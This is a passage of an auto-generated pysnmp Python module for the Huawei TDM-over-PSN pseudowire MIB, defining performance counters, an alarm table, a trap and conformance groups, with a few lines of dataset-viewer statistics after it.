hwTdmPsnPerfCurrentPktsReorder = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentPktsReorder.setStatus('current')
hwTdmPsnPerfCurrentJtrBfrUnderruns = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentJtrBfrUnderruns.setStatus('current')
hwTdmPsnPerfCurrentMisorderDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentMisorderDropped.setStatus('current')
hwTdmPsnPerfCurrentMalformedPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentMalformedPkts.setStatus('current')
hwTdmPsnPerfCurrentErrorSeconds = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentErrorSeconds.setStatus('current')
hwTdmPsnPerfCurrentSeverelyErrorSeconds = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentSeverelyErrorSeconds.setStatus('current')
hwTdmPsnPerfCurrentUnavailableSeconds = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentUnavailableSeconds.setStatus('current')
hwTdmPsnPerfCurrentFailureCounts = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentFailureCounts.setStatus('current')
# --- hwTdmPsnAlarmTable ------------------------------------------------------
# Alarm state per TDM pseudowire, same (PW id, PW type) indexing as the
# performance table above.
hwTdmPsnAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2), )
if mibBuilder.loadTexts: hwTdmPsnAlarmTable.setStatus('current')
hwTdmPsnAlarmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1), ).setIndexNames((0, "HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmPwIdIndex"), (0, "HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmPwTypeIndex"))
if mibBuilder.loadTexts: hwTdmPsnAlarmEntry.setStatus('current')
hwTdmPsnAlarmPwIdIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1, 1), Unsigned32())
if mibBuilder.loadTexts: hwTdmPsnAlarmPwIdIndex.setStatus('current')
hwTdmPsnAlarmPwTypeIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1, 2), HWL2VpnVcEncapsType())
if mibBuilder.loadTexts: hwTdmPsnAlarmPwTypeIndex.setStatus('current')
# PW status is an integer constrained to 1..6; the meaning of each value is
# defined in the original ASN.1 DESCRIPTION (not visible here).
hwTdmPsnAlarmPwStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 6))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnAlarmPwStatus.setStatus('current')
hwTdmPsnAlarmVcIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1, 4), InterfaceIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnAlarmVcIfIndex.setStatus('current')
# Notifications (branch .2): a single alarm trap carrying PW status and the
# VC interface index as varbinds.
hwTdmPsnMIBTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 2))
hwTdmPsnAlarmTrap = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 2, 1)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmPwStatus"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmVcIfIndex"))
if mibBuilder.loadTexts: hwTdmPsnAlarmTrap.setStatus('current')
# Conformance (branch .3): compliance statement plus object/notification
# groups. The `getattr(mibBuilder, 'version', ...) > (4, 4, 0)` guards are a
# pysmi-generated idiom: setStatus on these group objects is only supported
# by sufficiently new pysnmp builders.
hwTdmPsnMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3))
hwTdmPsnMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 1))
hwTdmPsnMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 1, 1)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentGroup"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwTdmPsnMIBCompliance = hwTdmPsnMIBCompliance.setStatus('current')
hwTdmPsnMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 2))
hwTdmPsnPerfCurrentGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 2, 1)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentMissingPkts"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentPktsReorder"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentJtrBfrUnderruns"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentMisorderDropped"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentMalformedPkts"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentErrorSeconds"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentSeverelyErrorSeconds"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentUnavailableSeconds"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentFailureCounts"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwTdmPsnPerfCurrentGroup = hwTdmPsnPerfCurrentGroup.setStatus('current')
hwTdmPsnAlarmGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 2, 2)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmPwStatus"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmVcIfIndex"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwTdmPsnAlarmGroup = hwTdmPsnAlarmGroup.setStatus('current')
hwTdmPsnNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 2, 3)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmTrap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwTdmPsnNotificationGroup = hwTdmPsnNotificationGroup.setStatus('current')
# Publish every defined object under the module name so other MIB modules
# (and the management code) can importSymbols them; PYSNMP_MODULE_ID marks
# the module-identity node.
mibBuilder.exportSymbols("HUAWEI-TDM-PSN-MIB", hwTdmPsnAlarmPwIdIndex=hwTdmPsnAlarmPwIdIndex, hwTdmPsnPerfCurrentPktsReorder=hwTdmPsnPerfCurrentPktsReorder, hwTdmPsnMIBCompliances=hwTdmPsnMIBCompliances, hwTdmPsnPerfCurrentSeverelyErrorSeconds=hwTdmPsnPerfCurrentSeverelyErrorSeconds, hwTdmPsnPerfCurrentGroup=hwTdmPsnPerfCurrentGroup, hwTdmPsnPerfCurrentFailureCounts=hwTdmPsnPerfCurrentFailureCounts, hwTdmPsnPerfCurrentMissingPkts=hwTdmPsnPerfCurrentMissingPkts, PYSNMP_MODULE_ID=hwTdmPsnMIB, hwTdmPsnAlarmTrap=hwTdmPsnAlarmTrap, hwTdmPsnAlarmTable=hwTdmPsnAlarmTable, hwTdmPsnMIBGroups=hwTdmPsnMIBGroups, hwTdmPsnPerfCurrentUnavailableSeconds=hwTdmPsnPerfCurrentUnavailableSeconds, hwTdmPsnPerfCurrentPwIdIndex=hwTdmPsnPerfCurrentPwIdIndex, hwTdmPsnMIBCompliance=hwTdmPsnMIBCompliance, hwTdmPsnAlarmEntry=hwTdmPsnAlarmEntry, hwTdmPsnAlarmPwStatus=hwTdmPsnAlarmPwStatus, hwTdmPsnPerfCurrentEntry=hwTdmPsnPerfCurrentEntry, hwTdmPsnPerfCurrentTable=hwTdmPsnPerfCurrentTable, hwTdmPsnMIBObjects=hwTdmPsnMIBObjects, hwTdmPsnPerfCurrentMisorderDropped=hwTdmPsnPerfCurrentMisorderDropped, hwTdmPsnPerfCurrentMalformedPkts=hwTdmPsnPerfCurrentMalformedPkts, hwTdmPsnNotificationGroup=hwTdmPsnNotificationGroup, hwTdmPsnPerfCurrentJtrBfrUnderruns=hwTdmPsnPerfCurrentJtrBfrUnderruns, hwTdmPsnMIB=hwTdmPsnMIB, hwTdmPsnPerfCurrentPwTypeIndex=hwTdmPsnPerfCurrentPwTypeIndex, hwTdmPsnMIBTraps=hwTdmPsnMIBTraps, hwTdmPsnAlarmPwTypeIndex=hwTdmPsnAlarmPwTypeIndex, hwTdmPsnAlarmVcIfIndex=hwTdmPsnAlarmVcIfIndex, hwTdmPsnMIBConformance=hwTdmPsnMIBConformance, hwTdmPsnPerfCurrentErrorSeconds=hwTdmPsnPerfCurrentErrorSeconds, hwTdmPsnAlarmGroup=hwTdmPsnAlarmGroup)
| 126.708861
| 1,648
| 0.777522
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.